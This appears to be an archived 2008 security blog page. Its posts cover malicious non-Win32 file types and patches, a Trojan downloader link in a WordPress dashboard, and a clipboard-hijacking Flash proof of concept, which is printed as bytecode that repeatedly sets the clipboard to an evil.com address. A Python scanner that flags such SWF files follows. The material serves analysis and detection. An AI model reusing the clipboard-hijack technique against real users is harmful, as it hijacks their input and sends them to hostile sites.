Archive

Archive for September, 2008

Porn Trojan Talks

Listen to Yourself by xkcd.com

Go Hawks!!!

As the grand final kicks off, today is the most spectacular moment of the Australian sporting calendar.

I love underdogs, Go Hawks!

After 5 hours:

Hawks won! If you know the story behind this game, it was indeed mission impossible for the Hawthorn Hawks to beat the Geelong Cats, but amazingly they won by 26 points (115/89). Life is full of surprises!

[Read Real Footy]

Good thing there’s NO malware related to this event! (“,)

Non-Win32 Malicious Files

There are heaps of non-Win32 malicious files currently in the wild. These files are crafted to allow attackers to remotely execute arbitrary code. Although they exploit known vulnerabilities, attackers still find them useful, as most of us do not bother applying security updates. The effect is massive installation of various threats on your computer.

FileType: SWF
Solution: Flash Player Update

FileType: RIFF Windows Animated Cursor
Solution: Microsoft Security Bulletin MS07-017

FileType: PDF
Solution: Adobe Reader and Acrobat Security Update

FileType: RAR
Solution: Update to latest version (version 3.61 and onwards)

Other files that do not rely on an exploit:

FileType: DOC, Excel, PPT, JPEG, CHM
Behaviour: Drops and installs a malicious EXE file

Filetype: ASF (Windows Audio/Video Files)
Behaviour: Connects to a remote IP address to download a malicious EXE file

For these kinds of files, please make sure they come from a trusted source, and make sure you have security software with updated signatures installed.

Related Post:
- Inside Exploited PDF
- ASF File Specification & Recent Threats
- Malicious CHM

First Day of Spring


We still feel the cold weather here in Melbourne, but Google just reminded me that it’s already Spring!

Latest Blog Post by malware

I found this in my (wordpress) dashboard at the lower right …

Once you click the link, it creates the following traffic in the background …

Good thing there was no DMG file for Mac OS X; instead it tries to download an EXE file for unfortunate, innocent Windows users. The file free.porn.movie.exe is a Trojan downloader.

After a few hours, WordPress responded to this malicious activity…

Stay informed!

Top Posts from WordPress

Notice, “Oprah Winfrey’s Death”…

It’s been all over the internet, but it definitely comes from an unreliable source. It’s just a sick hoax!

For sure, people have started searching for and verifying this information online, but be careful of dodgy websites! You might bump into drive-by download servers.

“Wsearch.net/?unknown” Is it a new DNSChanger?

As mentioned in my previous post, there has been a report about browser hijacking. However, as the days go by, more and more Mac OS X users share the same experience.

Unfortunately, this site serves unwanted pop-ups (Ads), although no malware has been found yet.

So what’s happening here?

On the 1st of June, a MozillaZine Forum user reported this incident and found that his DNS search domain had been set to “mygateway.net”. In the thread, they suspected that it was coming from the ISP (Rogers Cable).

A month later, another MozillaZine Forum user felt that the issue had 3 possible sources: 1) Zlob DNSChanger 2) DNS hijacking caused by SMC wireless routers 3) Rogers “service” hijacking URL searches

As more and more users experience this issue, I wonder if this is indeed related to Zlob’s DNSChanger. Unless someone can provide a DMG or URL for analysis, we can’t conclude that this incident is new DNSChanger-related activity.

Clipboard Hijacking SWF PoC

Thank God, I’m back …

So, the SWF PoC (proof-of-concept) for clipboard hijacking works cross-platform (Windows and Mac browsers). The sneaky behaviour does not exploit any vulnerability; instead it uses legitimate ActionScript, as mentioned in my previous post. Basically, if you refer to the SWF File Format Specification 9: SWF 9 introduced ActionScript 3.0 with the new DoABC (Do ActionScript Byte Code) action-definition tag. Like DoAction tags, DoABC defines a series of bytecode to be executed. However, this time the DoABC tag runs in the ActionScript 3.0 virtual machine [For further reading -> VM2 Overview].

From the PoC that was published…

// Defining the symbolclass "test_fla.MainTimeline" into the package
[052]       515 DOABC
class [package]test_fla:MainTimeline extends [package]flash.display:MovieClip, test_fla:MainTimeline, flags=08

{ // test_fla:frame1

constructor ---- [package]test_fla:MainTimeline()
[3 1 10 11 0]
{
getlocal_0
pushscope
getlocal_0
constructsuper 0 params
findpropstrict [package]:addFrameScript
pushbyte 00
getlex [packageinternal]test_fla:frame1
callpropvoid [package]:addFrameScript, 2 params
returnvoid
}
//test_fla:frame1() executes setClip()

method ---- [packageinternal]test_fla:frame1()
[3 1 10 11 0]
{
getlocal_0
pushscope
findpropstrict [package]flash.utils:setInterval
getlex [package]:setClip
pushbyte 01
callpropvoid [package]flash.utils:setInterval, 2 params
returnvoid
}

// setClip() push "http://www.evil.com" users' clipboard
method ---- [package]:setClip()
[2 1 10 11 0]
{
getlocal_0
pushscope
getlex [package]flash.system:System
pushstring "http://www.evil.com"
callpropvoid [package]:setClipboard, 1 params
returnvoid
} }
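Since the PoC relies only on legitimate API names, a defender can spot candidate files statically: walk the SWF tag list, pull out every DoABC tag, and look at the string constant pool of the embedded ABC block for names such as setClipboard and setInterval. The scanner below is an added example written for this post, not the PoC author’s code or anything from the SWF specification itself; the build_sample_swf helper, the WATCH_NAMES list and the sample file it constructs are assumptions made for the demo, and the parser reads only the int, uint, double and string pools of each ABC block (enough to recover the names shown in the disassembly above).

```python
"""Flag SWF files whose DoABC (tag 82) bytecode references clipboard APIs."""
import struct
import zlib

DOABC_TAG = 82     # DoABC tag code (SWF 9+, ActionScript 3.0 bytecode)
END_TAG = 0
# Assumed watch list: API names a reviewer wants surfaced from the ABC string pool.
WATCH_NAMES = ("setClipboard", "setInterval", "flash.system", "System")


def _u30(data, pos):
    """Decode an ABC u30 (base-128 varint, low bits first); return (value, new_pos)."""
    value, shift = 0, 0
    while True:
        b = data[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        shift += 7
        if not b & 0x80 or shift >= 35:
            return value, pos


def _enc_u30(v):
    """Encode an int as an ABC u30 varint (used only by the sample builder)."""
    out = bytearray()
    while True:
        b, v = v & 0x7F, v >> 7
        out.append(b | 0x80 if v else b)
        if not v:
            return bytes(out)


def abc_strings(abc):
    """Return the string constant pool of an ABC block (entry 0 is implicit/empty)."""
    pos = 4                                  # minor_version u16, major_version u16
    for _ in range(2):                       # int pool, then uint pool: varint entries
        count, pos = _u30(abc, pos)
        for _ in range(max(count - 1, 0)):
            _, pos = _u30(abc, pos)
    count, pos = _u30(abc, pos)              # double pool: 8-byte entries
    pos += 8 * max(count - 1, 0)
    count, pos = _u30(abc, pos)              # string pool: u30 size + UTF-8 bytes
    strings = []
    for _ in range(max(count - 1, 0)):
        size, pos = _u30(abc, pos)
        strings.append(abc[pos:pos + size].decode("utf-8", "replace"))
        pos += size
    return strings


def iter_tags(swf):
    """Yield (tag_code, body) for each tag of an FWS (raw) or CWS (zlib) SWF."""
    sig = swf[:3]
    if sig == b"CWS":
        swf = swf[:8] + zlib.decompress(swf[8:])
    elif sig != b"FWS":
        raise ValueError("not an SWF (no FWS/CWS signature)")
    nbits = swf[8] >> 3                      # frame-size RECT: 5-bit Nbits + 4 fields
    pos = 8 + (5 + 4 * nbits + 7) // 8       # skip RECT, rounded up to whole bytes
    pos += 4                                 # frame rate (UI16) + frame count (UI16)
    while pos + 2 <= len(swf):
        header = struct.unpack_from("<H", swf, pos)[0]
        pos += 2
        code, length = header >> 6, header & 0x3F
        if length == 0x3F:                   # long header: UI32 length follows
            length = struct.unpack_from("<I", swf, pos)[0]
            pos += 4
        yield code, swf[pos:pos + length]
        pos += length
        if code == END_TAG:
            break


def scan_swf(swf):
    """Return {doabc_name: [watched strings found]} for every DoABC tag in the file."""
    findings = {}
    for code, body in iter_tags(swf):
        if code != DOABC_TAG:
            continue
        name_end = body.index(b"\x00", 4)    # DoABC body: Flags UI32, then NUL-terminated Name
        name = body[4:name_end].decode("utf-8", "replace")
        hits = [s for s in abc_strings(body[name_end + 1:])
                if any(w in s for w in WATCH_NAMES)]
        if hits:
            findings[name] = hits
    return findings


def build_sample_swf(strings, compress=False):
    """Constructed test input: a minimal SWF with one DoABC tag holding only a string pool."""
    abc = struct.pack("<HH", 16, 46) + b"\x00\x00\x00"   # versions; empty int/uint/double pools
    abc += _enc_u30(len(strings) + 1)
    for s in strings:
        raw = s.encode("utf-8")
        abc += _enc_u30(len(raw)) + raw
    body = struct.pack("<I", 1) + b"frame1\x00" + abc     # Flags=1 (lazy init), Name
    tags = struct.pack("<HI", (DOABC_TAG << 6) | 0x3F, len(body)) + body + b"\x00\x00"
    payload = b"\x00" + struct.pack("<HH", 0x1800, 1) + tags   # RECT(Nbits=0), 24 fps, 1 frame
    header = struct.pack("<I", 8 + len(payload))
    if compress:
        return b"CWS\x09" + header + zlib.compress(payload)
    return b"FWS\x09" + header + payload


if __name__ == "__main__":
    sample = build_sample_swf(["flash.system", "System", "setClipboard", "http://www.evil.com"])
    print(scan_swf(sample))   # {'frame1': ['flash.system', 'System', 'setClipboard']}
```

The scanner only reports which API names a DoABC block mentions; a hit means the file deserves a look with a proper disassembler (as in the listing above), not that it is malicious, since many legitimate movies reference flash.system too.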

The interesting part here is not the code but the legitimate features and capabilities that allow it to cross boundaries and the security perimeter of users’ systems, making it intrusive, sneaky and a potential vector for attackers and malware.

Should developers make sure that their processes have their own execution domain?

So, whose fault is this?
